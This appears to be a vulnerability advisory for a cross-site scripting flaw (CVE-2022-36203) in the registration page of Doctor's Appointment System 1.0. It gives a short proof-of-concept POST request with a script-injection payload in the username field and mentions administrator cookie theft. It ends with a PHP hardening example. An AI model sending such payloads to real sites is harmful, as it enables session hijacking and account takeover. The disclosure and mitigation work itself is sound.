Headline
Doctor's Appointment System 1.0 Cross Site Scripting
Doctor’s Appointment System version 1.0 suffers from a cross site scripting vulnerability in register.php. Original discovery of cross site scripting in this version is attributed to Soham Bakore in February of 2021.
# Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 7/13/2022
# Exploit Author: Abdullah Zaid - @_aznull
# Vendor Homepage: https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2022-36203

POC:

POST /register.php HTTP/1.1
Host: localhost

username=a"><script>alert(1337)</script>&password=123
Related news
CVE-2022-36203: Doctor's Appointment System using PHP Free Source Code
Doctor's Appointment System 1.0 is vulnerable to Cross Site Scripting (XSS) via the admin panel. In addition, it leads to takeover of the administrator account by stealing the cookie via XSS.
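
Mitigation sketch for the two issues described above (attribute breakout through the username parameter, and session cookie theft). This is an added example, not the application's own code: the source of register.php is not shown on this page, so the reflection into an input's value attribute, the helper name h(), and the HTTPS and no-inline-script assumptions are all hypothetical.

```php
<?php
// Added illustration; NOT the application's real register.php.
// Assumption: the submitted username is echoed back into an input's value attribute.

// Session cookie hardening: HttpOnly keeps script from reading the session ID
// through document.cookie, which limits the cookie-theft path in the CVE text.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumes the site is served over HTTPS
    'samesite' => 'Lax',
]);
session_start();

/** Encode untrusted text for HTML element and quoted-attribute contexts. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$username = $_POST['username'] ?? '';
if (!is_string($username)) {
    $username = '';       // reject array-style parameters such as username[]=x
}

// Defense in depth; assumes the page loads no inline scripts of its own.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");

// Vulnerable pattern (shown for contrast, left commented out):
// echo '<input name="username" value="' . $username . '">';

// Hardened: the double quote and angle brackets are emitted as &quot; &lt; &gt;
// so the value cannot close the attribute or open a new tag.
echo '<input name="username" value="' . h($username) . '">';
```

With the POC value from this page, the hardened line renders the payload as inert text inside the attribute. Any stored copy of the username must be encoded the same way wherever the admin panel displays it.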